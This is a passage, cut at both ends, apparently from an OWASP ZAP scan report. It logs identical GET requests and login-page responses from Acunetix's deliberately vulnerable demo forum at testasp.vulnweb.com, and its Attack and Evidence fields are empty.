<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 